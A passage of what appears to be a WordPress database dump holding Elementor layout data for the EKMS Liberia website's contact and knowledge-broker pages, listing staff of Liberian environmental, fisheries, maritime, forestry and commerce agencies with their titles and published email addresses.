ize\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23277,3377,'_elementor_edit_mode','builder'),(23278,3377,'_elementor_template_type','wp-page'),(23279,3377,'_elementor_version','3.0.16'),(23280,3377,'_wp_page_template','default'),(23281,3377,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a 